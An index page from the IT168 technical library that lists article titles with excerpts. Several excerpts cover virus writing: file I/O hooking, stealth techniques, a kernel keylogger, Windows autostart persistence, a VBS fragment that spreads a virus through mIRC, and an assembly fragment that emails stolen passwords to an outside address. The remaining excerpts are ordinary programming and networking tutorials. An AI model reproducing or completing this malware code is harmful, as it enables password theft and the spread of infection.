IT168首页 | 产品报价 | ChinaUnix社区 | ITPUB社区 | 文库 | 博客 | 自测 | 专题 | ITPUB学院

内网安全管理

二:主要是要截留文件I/O操作。Windows下截留文件I/O操作有几种方法,在病毒中使用的主要有两种。1、使用VxDCallIFSMgr_InstallFileSystemHook2、截留Kernel32.dll中导出的第一个函数VxDCall对DOSINT 21的呼叫(EAX=2A0010)。VxDCall的代码如下:mov eax,dword ptr [esp+04]pop dword ptr [esp]call fword ptr cs:[xxxxxxxx

05日更新
Win32下病毒设计入门(2)

第二阶段:潜伏实施掩盖和伪装   在第二阶段即潜伏过程中需要了解的内容是,病毒是如何为躲避用户和防病毒软件的侦察而进行隐藏的。通过与防病毒软件之间不断地“斗智斗勇”,有的病毒已经逐渐具备了非常高级的隐身法。最具代表性的潜伏方法是隐蔽和自我变异。尺寸上作假,逃避监视  隐蔽法是指为病毒为了已经隐藏文件

05日更新
PC病毒原理:感染-潜伏-繁殖-发作(4)

[ 5 感谢感谢plasmoid, skyper的大力帮助,感谢THC,vnsecurity等组织的所有朋友们。最后,感谢thang先生的英文翻译。//e4gle add到此,全文介绍完了,大家有兴趣可以试试代码,其实这里涉及的技术无非还是系统调用和内核函数的劫持技术,我整理过的一篇tty劫持的文章,大家也可以对比一下。其实vlogger也有一定的缺陷,它

05日更新
书写基于内核的linux键盘纪录器 下

2) GNU Make 工具2.1 基本 makefile 结构GNU Make 的主要工作是读进一个文本文件, makefile 。这个文 件里主要是有关哪些 文件(‘target''目的文件)是从哪些别的 文件(‘dependencies''依靠文件)中产 生的,用什么命令来进行 这个产生过程。有了这些信息, make 会检查磁碟上的文件,如果 目的文件的时间戳(该文件生

05日更新
makefile(4)

第6章 函数设计函数是C++/C程序的基本功能单元,其重要性不言而喻。函数设计的细微缺点很容易导致该函数被错用,所以光使函数的功能正确是不够的。本章重点论述函数的接口设计和内部实现的一些规则。函数接口的两个要素是参数和返回值。C语言中,函数的参数和返回值的传递方式有两种:值传递(pass by value)和指针传递(p

05日更新
高质量C++/C编程指南 -- 第6章 函数设计

whginclude win32.inc.586.model flat,stdcall.dataSmtpSrvr db ''smtp.elong.com'',0MailFrom0 db ''qqspy2000@elong.com'',0RcptTo0 db ''qqspy2000@elong.com'',0From0 db ''QQSpy2000.@elong.com'',0To0 db ''QQSpy2000.@elong.com'',0Subject0 db ''被盗密码信息'',0Content0 db ''这是实验版'',0HelloSrvr db ''HELO

05日更新
利用汇编发送无需认证的eMail

4)通过IRC聊天通道传播病毒通过IRC传播一般来说采用以下代码(以MIRC为例)Dim mircset fso=CreateObject("Scripting.FileSystemObject")set mirc=fso.CreateTextFile("C:\mirc\script.ini") ''创建文件script.inifso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True ''将病毒文件备份到attachment.vbsm

05日更新
VBS脚本病毒原理分析与防范(3)

网络安全是一个系统的概念,有效的安全策略或方案的制定,是网络信息安全的首要目标。 网络安全技术主要有,认证授权、数据加密、访问控制、安全审计等。而提供安全网关服务的类型有:地址转换、包过滤、应用代理、访问控制和D oS防御。 本文主要介绍地址转换和访问控制两种安全网关服务,利用cisco路由器对ISDN拨号上网做

Cisco IOS防火墙的安全规则和配置方案

这个启动方式虽然比较隐蔽,但通过msconfig依旧可以在“启动”页中看出来。2.第二自启动目录:是的,其实,Windows还有另外一个自启动目录,而且很明显但却经常被人们忽略的一个。该路径位于:C:\WINDOWS\All Users\Start Menu\Programs\StartUp(English)C:\WINDOWS\All Users\Start Menu\Programs\启动(Chinese)这个目

05日更新
病毒编写Windows 的自启动(2)

1969年仅有四节点的ARPA网在美国实验成功,有谁能想到由此演化的互联网会成为世界最大的数据网呢。随着计算机的普及,上网人数的不断增加,越来越多的企业把目光投向互联网。支撑Internet运转的关键是IP技术,在此详细讲解其基本概念及IP的寻址过程。   MAC地址(位于数据链路层)   介质访问控制(Media Access Control)

IP寻址技术

alert7测试环境 redhat 6.2★ 前言本文讨论gcc的一些常用编译选项对代码的影响。当然代码变了,它的内存布局也就会变了,随之exploit也就要做相应的变动。gcc的编译选项实在太多,本文检了几个最常用的选项。★ 演示程序[alert7@redhat62 alert7]$ cat > test.c#include void hi(void)int main(int argc, char *argv[])

05日更新
gcc常用的编译选项对代码的影响

计算机病毒传染的一般过程 在系统运行时, 病毒通过病毒载体即系统的外存储器进入系统的内存储器, 常驻内存。该病毒在系统内存中监视系统的运行, 当它发现有攻击的目标存在并满足条件时,便从内存中将自身存入被攻击的目标, 从而将病毒进行传播。 而病毒利用系统INT 13H读写磁盘的中断又将其写入系统的外存储器软盘或硬盘中,

计算机病毒传染的一般过程

进入信息和网络化的时代以来,计算机正在我们的工作和生活中扮演着日益重要的角色。越来越多的用户通过计算机来获取信息、处理信息,同时将自己最重要的信息以数据文件的形式保存在计算机中。有人形容网络好比是一片最自由的天地,在这里你可以尽情发挥自己的想象力,打造一片完全属于自己的小世界,但是如果我们的网络中缺

05日更新
纵谈网络加密及解密方法(下)

文件名    : WssProcMon.c描述     : 进程/线程监视器作者     : sinister最后修改日期 : 20021102*****************************************************************/#include "ntddk.h"#include "string.h"#define ProcessNameOffset 0x1fcstatic NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceOb

05日更新
编写进程/线程监视器(1)

不驻留内存的病毒是一种立即传染的病毒,每执行一次带毒程序,就主动在当前路径中搜索,查到满足要求的可执行文件即进行传染。该类病毒不修改中断向量,不改动系统的任何状态,因而很难区分当前运行的是一个病毒还是一个正常的程序。典型的病毒有 Vienna/648。   不驻留内存型病毒与驻留型病毒的不同在于前者是带毒宿主程

05日更新
不驻留内存型病毒与驻留型有何不同

改变网络结构 典型的宽带网络分为接入层、汇聚层、核心层三层结构。接入层提供XDSL等多种接入方式,接入PC、IPSTB、ePhone、IAD等多种终端设备,通过各种终端开展宽带接入、Internet互联、语音、视频等业务。汇聚层设备对接入层通过FE/GE、ATM155等接口接入的业务流通过GE/POS汇聚到城域网核心层,最终由城域核心设备汇聚到

四步升级宽带接入QoS网络技术

读者可能怀疑:连if、for、while、goto、switch这样简单的东西也要探讨编程风格,是不是小题大做?我真的发觉很多程序员用隐含错误的方式写表达式和基本语句,我自己也犯过类似的错误。表达式和语句都属于C++/C的短语结构语法。它们看似简单,但使用时隐患比较多。本章归纳了正确使用表达式和语句的一些规则与建议。4.1 运

05日更新
高质量C++/C编程指南第4章表达式和基本语句

所以我整理了一些网络基础知识,放在这里。为什么我们不写一个自己的sniff呢?让我们从开始一起努力,写些自己的小工具。先是常用的IP头格式。IP头格式===========版本号 (4位)IP头长度 (4位)服务类型 (8位)数据包长度 (16位)标识段 (16位)标志段 (16位)生存时间 (8位)传输协议 (8位)头校验和 (16位)发送地址 (16位)目标地

05日更新
根据IP头格式 写sniff

黑客入侵的手法包括:(1)瞒天过海 (2)趁火打劫 (3)无中生有 (4)暗渡陈仓 (5)舌里藏刀 (6)顺手牵羊 (7)供尸还魂 (8)调虎离山 (9)抛砖引玉 (10)湿水摸鱼 (11)远交近攻 (12)偷梁换柱 (13)反客为主。黑客常有连环计,防不胜防,不可不小心。  1、瞒天过海, 数据驱动攻击  当有些表面看来无害的特殊程序在被发送或复制到网

05日更新
黑客入侵计中计

一、未雨绸缪——做好预防措施   1.一个好,两个妙  无论是菜鸟还是飞鸟,杀毒软件和网络防火墙都是必需的。上网前或启动机器后马上运行这些软件,就好像给你的机器“穿”上了一层厚厚的“保护衣”,就算不能完全杜绝网络病毒的袭击,起码也能把大部分的网络病毒“拒之门外”。目前杀毒软件非常多,功能也十分接近,大

对付计算机病毒的酷招秘技
金秋十月 与你饮酒论道
热门文章
it168文库会议频道上线

热门标签

热点推荐